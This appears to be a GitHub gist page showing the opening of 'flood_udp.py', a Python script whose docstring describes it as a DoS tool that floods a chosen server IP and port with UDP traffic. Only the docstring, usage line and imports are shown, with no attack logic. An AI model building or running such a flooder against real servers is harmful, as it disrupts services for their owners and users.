Skip to content

Instantly share code, notes, and snippets.

View javiervbk's full-sized avatar

Javier Villalobos javiervbk

View GitHub Profile
@javiervbk
javiervbk / flood_udp.py
Created April 3, 2019 19:52 — forked from hedinasr/flood_udp.py
Python UDP Flooder
"""
UDP Flooder.
This is a 'Dos' attack program to attack servers, you set the IP
and the port and the amount of seconds and it will start flooding to that server.
(inspire from http://hazardedit.com/forum/viewtopic.php?t=73)
Usage : ./flood_udp <ip> <port> <second>
"""
import time
import socket